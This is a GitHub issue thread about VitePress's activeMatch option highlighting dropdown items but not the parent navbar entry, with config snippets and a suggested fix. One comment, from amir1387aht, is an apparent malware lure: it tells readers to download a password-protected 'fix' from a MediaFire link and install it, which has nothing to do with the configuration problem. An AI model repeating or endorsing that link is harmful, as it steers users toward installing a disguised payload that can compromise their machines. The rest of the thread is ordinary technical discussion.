### ISSUE TITLE
activeMatch只生效于展开菜单内

### ISSUE THREAD

**Issue by BlazeSnow** [vuejs/vitepress#4163]
### 侧边栏选中第一个条目时，activeMatch正常显示于展开菜单以及导航栏
![1](https://github.com/user-attachments/assets/ac79fd8f-28d2-4729-b112-e8f43f8a05f3)
### 选中第二个及以后的条目时，activeMatch正常显示于展开菜单，但是不显示于导航栏
![2](https://github.com/user-attachments/assets/96084f1f-87ef-41f0-9c12-98959ed2cc1e)

## 个人测试
经过测试，此现象与ASCII字符无关，使用`/test/index.md`和`/test/test.md`也会出现此现象
### nav
```ts
{

                text: '关于',

                items: [

                    {

                        text: '更新日志',

                        link: '/更新日志/',

                        activeMatch: '/更新日志/'

                    },

                    {

                        text: '关于本站',

                        link: '/about'

                    }

                ]

            }
```
### sidebar
```ts
'/更新日志/': [

                {

                    text: '更新日志',

                    items: [

                        { text: '2024年8月', link: '/更新日志/' },

                        { text: '2024年7月', link: '/更新日志/2024年7月' },

                        { text: '2024年6月', link: '/更新日志/2024年6月' },

                        { text: '2024年5月', link: '/更新日志/2024年5月' },

                    ]

                }

            ],
```

### Expected behavior

侧边栏选中任何条目时，activeMatch正常显示于展开菜单以及导航栏

### System Info

```Text
System:
    OS: Windows 11 10.0.22631
    CPU: (20) x64 12th Gen Intel(R) Core(TM) i7-12700H
    Memory: 7.42 GB / 15.69 GB
  Binaries:
    Node: 22.6.0 - C:\Program Files\nodejs\node.EXE
    npm: 10.8.2 - C:\Program Files\nodejs\npm.CMD
  Browsers:
    Edge: Chromium (127.0.2651.74)
    Internet Explorer: 11.0.22621.3527
  npmPackages:
    vitepress: ^1.3.4 => 1.3.4
```

### Validations

- [X] Check if you're on the [latest VitePress version](https://github.com/vuejs/vitepress/releases/latest).
- [X] Follow our [Code of Conduct](https://vuejs.org/about/coc.html)
- [X] Read the [docs](https://vitepress.dev).
- [X] Check that there isn't already an issue that reports the same bug to avoid creating a duplicate.

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by BlazeSnow** [comment]
此问题仍然未得到解决？我制作了一个示例网站来帮助理解此问题。

Is this issue still unresolved? I made a sample website to help understand this problem.

https://blazesnow-vitepressissue.vercel.app/

**Comment by Zhengqbbb** [comment]
```ts
nav: [
      { text: 'Home', link: '/' },
      {
        text: 'Examples',
        activeMatch: '^/test',
        items: [
          {
            text: 'test',
            activeMatch: '^/test',
            link: '/test/',
          }
        ]
      }
    ],
```

**Comment by Zhengqbbb** [comment]
https://github.com/user-attachments/assets/aebd094b-dc73-4c68-b1c7-61a8246caf3f

**Comment by BlazeSnow** [comment]
感谢你的帮助，但是我注意到无论在Examples的activematch输入任何内容，test被高亮时，Examples总是会高亮。我已经将代码同步到示例网站。

Thank you for your help, but I've noticed that whenever test is highlighted, Examples are always highlighted no matter what you type in the Examples' activematch. I have synced the code to the sample site.

```
{
        text: 'Examples',
        activeMatch: '/whatever/',
        items: [
          {
            text: 'test',
            activeMatch: '/test/',
            link: '/test/',
          },
          {
            text: 'another',
            activeMatch: '/another/',
            link: '/another/',
          }
        ]
      },
```

**Comment by BlazeSnow** [comment]
因为原本的问题已经解决，我将关闭此issue并提交新问题。

Since the original issue has been resolved, I will close this issue and submit a new one.
